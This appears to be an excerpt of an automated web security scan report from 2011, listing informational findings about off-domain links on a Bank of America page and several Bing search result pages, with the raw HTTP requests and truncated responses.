                                                               <a name="investment_services_overview" href="https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1" target="_self">Merrill Edge Advisory Center</a>
...[SNIP]...
<NOSCRIPT>
       <IFRAME SRC="https://fls.doubleclick.net/activityi;src=1359940;type=front061;cat=2010b535;ord=1;num=?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

20.49. https://www.bankofamerica.com/hub/index.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /hub/index.action

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hub/index.action?template=productsandservices HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:47 GMT
Content-type: text/html; charset=ISO-8859-1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache, post-check=0, pre-check=0
Content-language: en-US
Set-cookie: JSESSIONID=0000qDqZdnP61E-wvCLTqnL8EjR:12qb4k2ev; Path=/; Secure
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html lang="en-us">
<head>
   
   <title>Bank of America | Products & Services | Overview</title>
   <meta name="Description" content="
...[SNIP]...
<div id="flash" style="display:none">
                                               <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="https://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="747" height="152" id="learning_center" align="middle">
                                               <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<li class="navcontainer1"><a href="https://www.baisidirect.com/" class="homepage_link">Online Brokerage</a>
...[SNIP]...

20.50. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=unified+threat+management&go=&form=QBLH&qs=n&sk= HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; RMS=F=Gg&A=AAAAAAAAAAAQ; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=981&CH=999&bIm=193; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 13:54:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://en.wikipedia.org/wiki/Unified_Threat_Management" onmousedown="return si_T('&amp;ID=SERP,5067.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Unified_Threat_Management#Brief_history" onmousedown="return si_T('&amp;ID=SERP,5050.1')">Brief history</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Unified_Threat_Management#Transition_from_point_to_integrated_security_solutions" onmousedown="return si_T('&amp;ID=SERP,5051.1')">Transition from point ...</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Unified_Threat_Management#How_UTM_secures_the_network" onmousedown="return si_T('&amp;ID=SERP,5052.1')">How <strong>
...[SNIP]...
<h3><a href="http://www.watchguard.com/why/utm.asp" onmousedown="return si_T('&amp;ID=SERP,5096.1')"><strong>
...[SNIP]...
<h3><a href="https://www.trustwave.com/utm.php" onmousedown="return si_T('&amp;ID=SERP,5127.1')"><strong>
...[SNIP]...
<h3><a href="http://www.itrportal.com/absolutenm/templates/?a=3056&amp;z=5" onmousedown="return si_T('&amp;ID=SERP,5145.1')">Secure Computing Announces Worldwide Channel Launch of SnapGear ...</a>
...[SNIP]...
<h3><a href="http://unifiedthreatmanagement.com/" onmousedown="return si_T('&amp;ID=SERP,5163.1')"><strong>
...[SNIP]...
<h3><a href="http://www.checkpoint.com/products/utm/index.html" onmousedown="return si_T('&amp;ID=SERP,5182.1')"><strong>
...[SNIP]...
<h3><a href="http://www.fortinet.com/press_releases/040922.html" onmousedown="return si_T('&amp;ID=SERP,5200.1')">Fortinet Named Market Leader of New <strong>
...[SNIP]...
<h3><a href="http://www.cyberoam.com/" onmousedown="return si_T('&amp;ID=SERP,5252.1')">Cyberoam : Securing You</a>
...[SNIP]...
<h3><a href="http://searchmidmarketsecurity.techtarget.com/definition/unified-threat-management" onmousedown="return si_T('&amp;ID=SERP,5271.1')">What is <strong>
...[SNIP]...
<h3><a href="http://servers.bestsellerguide.com/cheap-prices-tmg-2000-microsoft-threat-management-gateway-2010-appliance/" onmousedown="return si_T('&amp;ID=SERP,5291.1')">Cheap Prices ... TMG-2000 Microsoft <strong>
...[SNIP]...
<h3><a href="http://1044095.r.msn.com/?ld=4vZZka8SwtRItv-MrDhezW0OFm9hHmlf0klG8ed5569Q_mOaN-c_QH-x_U0hDy5rwYPpgrmya2RN9PLG4NP0TcD5Js-thiu9RgzVeLCBDRHPrTztjdxBe0b3eYbjkAH9YUU8XMUwCBQv7dEeqZhigTw6A9w_1efj_t58hNfmGx2oDpJOJZ6X1lstWYga_ivlSYh8dfYMeimnIWo_X1kCgYgWe6ptiHCFjeo8Au1DCVfB9UJjhwvbuBF9OB5nWnUiMnHqNk2xZgbzhYoNvdtGhMxTCZVMui4qcBCMeRLXCVrzqOJd9CpuBEJ3F9tja7yDzThMijhcEW31AE4KhIlYua4TVUCUyLtxDYBio6zo2bCiJ0_TZlECZjcz1J3v9G8pR0rUV0gd23KpBIEsd5stgoNzpFxOmTSoyZhw" onmousedown="return si_T('&amp;ID=FD,61.1,Ads')">A Better Spam Trap- Abaca</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vDpkItzfeeucWEwOjLLUJHeqFjeKaXKdSiDegGJJCmXhH7Wc995DF0N_2MOu3nmoLmkJj2nE9HK9bZhiw6zGNj1K0E1LJvGhdffffAx5VhGikwprYbYeeIqilHyDSTZMFkOxQuyrQXu4dOgNv-H5Mxv05tyIW4fhiqtxlbaaxNuSbwDfnXDIjkCjR8ycOmJSFFpB6wI4ad1j3v767RKFLMRojpbUzk8IMSBfbvxNDKU3fIZfAuBR1ey_c0b2RrHLo9FOsFmyosOBQPuTwGSoxnK8-6MlTiUJp1ehrfHktoCTrYAkRqjBF-BdytZWftPi4NVQJTGMh_1WNAYYyzAm8AeLwhy0QJmNzPYnL7TgtYgNtkqDiV7EomInhzy1kH78ukL6zIBXkzR2b" onmousedown="return si_T('&amp;ID=FD,63.1,Ads')">gateways</a>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&amp;ID=FD,59.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,117.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,119.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,121.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,123.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,125.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,127.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=unified+threat+management&amp;P3=0&amp;P4=QBLH&amp;P5=B506C07761D7465D924574124E3C14DF&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=http%3a%2f%2fwww.bing.com%2f&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dunified+threat+management%26go%3d%26qs%3dn%26sk%3d%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,129.1')">Tell us what you think</a>
...[SNIP]...

20.51. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=email+spam+virus&go=&form=QBRE&qs=n&sk=&sc=8-4 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=unified+threat+management&go=&form=QBLH&qs=n&sk=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; RMS=F=OgAg&A=QAAAAAAAAAAQ; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=987&CH=983&bIm=193&hIm=983

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 13:54:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4v2VinoXbyncjMiwV26O_z66jpMSLhy34rBPG-5DxdPWgzc4-ZpNHSTQBkJcKpW3Q9Wd8md2gQDpTZO1lIcLovfbAnBOQiqCWYtG-eWjN7TyKBv-H7Y4BOPNSOj9lz_kQ4DQRx8Jzaa1gwDgdH8IxdxCwRkXhn94h1Vzbe4HM6IKU7ZZozyJ9MMnFNNegSJOnrODmjp8wLWvg5y0CnwXBcWN4kHjS9n2B4rvT6F904mPW1RfV4dKSvTOKOwvrTFmEoXrcfW5T4im2E-P_ucoeBR2FCKEgXnFFVBmYXtVyziHSHWzzI7XBML_D8YfKIIMM3NVQJTNAqyn_mhogDPYdhLnsMfQEQJmNzPWCZMAoJO1lyUuwcqyYvDZL4Sd4yj0O4q34P_j9x60ib" onmousedown="return si_T('&amp;ID=FD,58.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vHu06N-ohN-8i36GxpQ7xTKRVDtO9_XcdIwwRBSjOHXvl0vU5dH8tzEVOotPfpsgQqpqUkHMeBOMxl_1GSUakaGxM-qlQaaNrDFLrWCW0vhOgd62TcCUuCWx7YCSwyv9kJ7IiGK4tu9C-ardZPznF2etn8ntwCEqUSbc_KNXqLETSehFwCAtYH5ygP63Mngz5xAKTMIp4G3L_sHV_9OudYDBMH4NenZ3plLe_O2vnsKxI20IQQBvAmD-Kaqn6CkMwD7pFnARVVxGvR0cXE041OzVUCUw5-V3ntY4U5VypC8u4uxjyECZjcz1EBoFIgv1ir11EupqckCR_XiHEigCwjGBEs_0BG3Whfw" onmousedown="return si_T('&amp;ID=FD,60.1,Ads')">Norton... Antivirus - Free</a>
...[SNIP]...
<h3><a href="http://en.wikipedia.org/wiki/E-mail_spam" onmousedown="return si_T('&amp;ID=SERP,5087.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/E-mail_spam#Overview" onmousedown="return si_T('&amp;ID=SERP,5063.1')">Overview</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/E-mail_spam#Types" onmousedown="return si_T('&amp;ID=SERP,5064.1')">Types</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/E-mail_spam#Spam_techniques" onmousedown="return si_T('&amp;ID=SERP,5065.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/E-mail_spam#Legality" onmousedown="return si_T('&amp;ID=SERP,5066.1')">Legality</a>
...[SNIP]...
<h3><a href="http://www.pchell.com/virus/spam.shtml" onmousedown="return si_T('&amp;ID=SERP,5116.1')">PC Hell: The <strong>
...[SNIP]...
<h3><a href="http://www.tamingthebeast.net/articles4/virus-spam.htm" onmousedown="return si_T('&amp;ID=SERP,5134.1')"><strong>
...[SNIP]...
<h3><a href="http://www.ehow.com/how_6826475_remove-spam-virus.html" onmousedown="return si_T('&amp;ID=SERP,5164.1')">How to Remove a <strong>
...[SNIP]...
<h3><a href="http://www.mail.com/" onmousedown="return si_T('&amp;ID=SERP,5218.1')">Get free <strong>
...[SNIP]...
<h3><a href="http://antispam.yahoo.com/virus" onmousedown="return si_T('&amp;ID=SERP,5244.1')"><strong>
...[SNIP]...
<h3><a href="http://abcnews.go.com/Technology/virus-mail-spreads-online/story?id=11596433" onmousedown="return si_T('&amp;ID=SERP,5287.1')">'Here You Have' <strong>
...[SNIP]...
<h3><a href="http://www.experts-exchange.com/Virus_and_Spyware/Anti-Virus/Email_Anti-Virus/Q_26030666.html" onmousedown="return si_T('&amp;ID=SERP,5304.1')">Yahoo <strong>
...[SNIP]...
<h3><a href="http://www.barracudanetworks.com/ns/products/spam_overview.php" onmousedown="return si_T('&amp;ID=SERP,5359.1')">Barracuda <strong>
...[SNIP]...
<h3><a href="http://www.librarysupportstaff.com/4emailthinking.html" onmousedown="return si_T('&amp;ID=SERP,5378.1')">Chain letters, hoaxes, <strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4v2VinoXbyncjMiwV26O_z66jpMSLhy34rBPG-5DxdPWgzc4-ZpNHSTQBkJcKpW3Q9Wd8md2gQDpTZO1lIcLovfbAnBOQiqCWYtG-eWjN7TyKBv-H7Y4BOPNSOj9lz_kQ4DQRx8Jzaa1gwDgdH8IxdxCwRkXhn94h1Vzbe4HM6IKU7ZZozyJ9MMnFNNegSJOnrODmjp8wLWvg5y0CnwXBcWN4kHjS9n2B4rvT6F904mPW1RfV4dKSvTOKOwvrTFmEoXrcfW5T4im2E-P_ucoeBR2FCKEgXnFFVBmYXtVyziHSHWzzI7XBML_D8YfKIIMM3NVQJTNAqyn_mhogDPYdhLnsMfQEQJmNzPWCZMAoJO1lyUuwcqyYvDZL4Sd4yj0O4q34P_j9x60ib" onmousedown="return si_T('&amp;ID=FD,64.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vHu06N-ohN-8i36GxpQ7xTKRVDtO9_XcdIwwRBSjOHXvl0vU5dH8tzEVOotPfpsgQqpqUkHMeBOMxl_1GSUakaGxM-qlQaaNrDFLrWCW0vhOgd62TcCUuCWx7YCSwyv9kJ7IiGK4tu9C-ardZPznF2etn8ntwCEqUSbc_KNXqLETSehFwCAtYH5ygP63Mngz5xAKTMIp4G3L_sHV_9OudYDBMH4NenZ3plLe_O2vnsKxI20IQQBvAmD-Kaqn6CkMwD7pFnARVVxGvR0cXE041OzVUCUw5-V3ntY4U5VypC8u4uxjyECZjcz1EBoFIgv1ir11EupqckCR_XiHEigCwjGBEs_0BG3Whfw" onmousedown="return si_T('&amp;ID=FD,66.1,Ads')">Norton... Antivirus - Free</a>
...[SNIP]...
<h3><a href="http://75294.r.msn.com/?ld=4vJ6VM5F14G5LQn2O7YWhiVMVOP9aRkBGAOH3cOwj77qSZodN3WS2gkPwxn3NRCDjaxHest0XNT4Mh5efFUsJWmyyMRr4adCwxzh6DEbgQywJkCd8kMttgKzEbM2yqkiwB0EqNp080L8V72e72ilI0iCUJFr09ed1kgXuCG120wtLnfy_5Hp1Vo262UzYXgXNeNwRW_cpgt0-UaCxf5bzs1BvLq1E0L7EeIyG3WdKvLtxaAykKXVqBZEt4N7buACNyFMJfn8myDORKAPTQaq6LdwCPEWDfyyjNedluuXG6oWWrJ1UbnVNzvU_TeHo4GhhhO8aBtDdmoGJGjR2f7W4u7_IOjh_OpwNTrS9HYHbZKBrt3nHV_X8fioadhm8VZjGW58e6ir8s3ZSZFm7xLz3__QYQJCIqAva1V0R-rvkb8LAZxaMZdhFEFHSdNBwnk3DjNVQJTCsAEQrxmlNtRuVl9BL-4EIQJmNzPb0oouqFk7OOJS_FTEc3Aq8MT4BveasrdxZJfczkuNUi" onmousedown="return si_T('&amp;ID=FD,70.1,Ads')">AntiVirus Protection</a>
...[SNIP]...
<h3><a href="http://623996.r.msn.com/?ld=4viC9TYfU8mNwAkh6u4NWlO-kX7RWP6IJNtcxLk79V3C1Ao5j-__8MuVPRNW66XxADOwxbOZGoygOSHFYcKWKyt7jFhMujzzJ7AjWLvhs1J2YCqusm0z9FEyZVPvw9u--b3V8znktninWmucaYuDhMubBWo6D-F-hsQd6KJsMiLFdidMXdGo5Poiy_SSb6TcHfLoVTqN--J9EiRYI841WDXriua8WMkkO3swCoN1zFNGcKG3ugEIfWBM9SJP9O6neTNVQJTGg4WwXu9Q0cVUM7OagjH0IQJmNzPS0ROOQyE11MNKGV63-CUBapeBVm-vzvTRreDeA_zmYt" onmousedown="return si_T('&amp;ID=FD,72.1,Ads')">How To Stop <strong>
...[SNIP]...
<h3><a href="http://32555.r.msn.com/?ld=4v-6XsmhYhumWinyNooVo5bKL75klKFkTbpw2lVHjTpnPK5qsCOdvs4BZbiplf7PwK1W3Uo7rDL768mgWPwBrKNHipknZlm2GZ5995bbGNXxO2fQNFN9T0qPkRRZwpcoSWBJdKhB98eimile0qdjGNaX4HNQbwhr9RwnITqpZGhmwXvF2Pjg3p1QCr6esxwXaj0QKGjAlefDljNT8bjbACRKW2j4MNVPYPgyUUm7nzTnTg3P4GHffHFu2Bgo7x82rrNVQJTPrhOj9U5Lmpc5gk1A-ZpQwQJmNzPa8Q9d-hjlt-sokgHXRj6QkEjkWzX-_pBVSJOkSfypGy" onmousedown="return si_T('&amp;ID=FD,74.1,Ads')">Antivirus - Free Download</a>
...[SNIP]...
<h3><a href="http://1183525.r.msn.com/?ld=4vLg4vvECHMHu_FJWBP8DNzPMF1g3x5XZEXsMX9f9trr_wyNFNXcRymAa1VTLO9Z1L7md4xVN237jvC4S9a56G82f0VJeXAUB9U9N2MOU2ooe95-IynJ3dWjTMwc6zlGE-78L63uLiagMs4LM8QIzx3ZkNQP2Uu-uIrq_hxN4D59DoPkLL85ef7xXx76-DcFa7MfIm6LWgP6_fhC9W6pxPKxjZjf3BZzopYKDpcao8x8J0jAu3o0rhfj6d3jymHrNW6x7rQ0z-yAxlHZH0B0bbCxIiBW1dHuFr8vmwrxlJgYYwLLGWecS81P_ty8D8YAbMeaxXkJrIECanlXGvh223O52k9cWd-lO9DVPCOu-vjcTJgxHvCkJmdqS42UlnsmfPNVQJTGCZvejd1iCQ92ZHz2YMGgcQJmNzPVb6UyX5xE3rO9iNma_VHvIZV3cV5N1uZEhLDxuKYH2I" onmousedown="return si_T('&amp;ID=FD,76.1,Ads')">Yahoo! Downloads</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vsfeiXwr3hC3vIMdg0hIHJkvvwJIJN4J91wkX8Js_8fdvwCtefmkPoclsQNyquEFjMc-rMeNCxJ79QS9WFx8kXtACP1GRT0w9d6-LJN7OlfGtCl7qc3CNLV1sb0ECDKdlvrBjMtewycUVaAA530KDaVNxUJja9NSCqTODTT3fJpniwho_m0CqQWkHfhqqmUvcc5A00UvUveVRm5sIb1dOp0phlAU6dV_h70omgP50v8CS5rsVWg_X4Ene_B6_xYSoHEsSf3Rgcql1G7xhOHDs9bNMGO54DYlUofvCQf_aD0IWQpURNWuHDCS2R6FTFU1fyoPvtHQpepO-YLJ_XoxQMTVUCUzm7lqJbhKQUfQ5rIGSnI1tECZjcz28vQTMW1xkVetOMU0Hq5xQuK4gvUWybM7iQjMaguTsYw" onmousedown="return si_T('&amp;ID=FD,78.1,Ads')"><strong>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&amp;ID=FD,68.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,110.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,112.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,114.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,116.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,118.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,120.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=email+spam+virus&amp;P3=0&amp;P4=QBRE&amp;P5=B506C07761D7465D924574124E3C14DF&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dunified%2bthreat%2bmanagement%26go%3d%26form%3dQBLH%26qs%3dn%26sk%3d&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3demail+spam+virus%26go%3d%26qs%3dn%26sk%3d%26sc%3d8-4%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,122.1')">Tell us what you think</a>
...[SNIP]...

20.52. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=spam+virus+block&go=&form=QBRE&qs=n&sk=&sc=8-10 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=email+spam+virus&go=&form=QBRE&qs=n&sk=&sc=8-4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; RMS=F=OgAg&A=QAAAAAAAAAAQ; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=987&CH=940&bIm=193&hIm=983

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:20:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 29107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://15110.r.msn.com/?ld=4vGcSGZFxb0nh5UPBKJIrkEmRuqOxSDB9SWROULan7rF9EpW9-Tk6bIj2K5dtXMINOFsB95w4g0VM__zewxYayzwJbOOGBAxZu2pNdC5nhcLqvoMAG3zQuLoA_Xpoq1kmu5lZcmI5PEYzxYnI7B4DPPdUUTtOSurqwjmndey6GuqeZjBxee1ruapgd6xFfEOh0pr8a3uTwZLXzF2uqOSl9Lk0UTbt_zKUhP345qdZdVUg1VAlMP5FaOqb5otnAuPvktZrW_RAmY3M9vkvkTMnjg2CXYKoHiW4RWT9dwpJDBpYsz_QP3piuZx4" onmousedown="return si_T('&amp;ID=FD,58.1,Ads')">Free <strong>
...[SNIP]...
<h3><a href="http://www.virusblock.net/" onmousedown="return si_T('&amp;ID=SERP,5054.1')"><strong>
...[SNIP]...
<h3><a href="http://www.spamlaws.com/spam-blocker.html" onmousedown="return si_T('&amp;ID=SERP,5082.1')"><strong>
...[SNIP]...
<h3><a href="http://www.barracudanetworks.com/ns/products/spam_screenshots.php" onmousedown="return si_T('&amp;ID=SERP,5110.1')">Barracuda <strong>
...[SNIP]...
<h3><a href="http://www.provantage.com/cisco-systems-blkr-svb-250u-3y~7CSC93RK.htm" onmousedown="return si_T('&amp;ID=SERP,5138.1')">PROVANTAGE: Cisco Systems BLKR-SVB-250U-3Y <strong>
...[SNIP]...
<h3><a href="http://www.speed.net/support/block/" onmousedown="return si_T('&amp;ID=SERP,5157.1')">SpeedGate Communications -- <strong>
...[SNIP]...
<h3><a href="http://netwinsite.com/surgemail/help/protected.htm" onmousedown="return si_T('&amp;ID=SERP,5185.1')"><strong>
...[SNIP]...
<h3><a href="http://www.barracudanetworks.com/ns/products/spam_faq.php" onmousedown="return si_T('&amp;ID=SERP,5213.1')">Barracuda <strong>
...[SNIP]...
<h3><a href="http://www.rocketspam.co.nz/" onmousedown="return si_T('&amp;ID=SERP,5237.1')">Rocket <strong>
...[SNIP]...
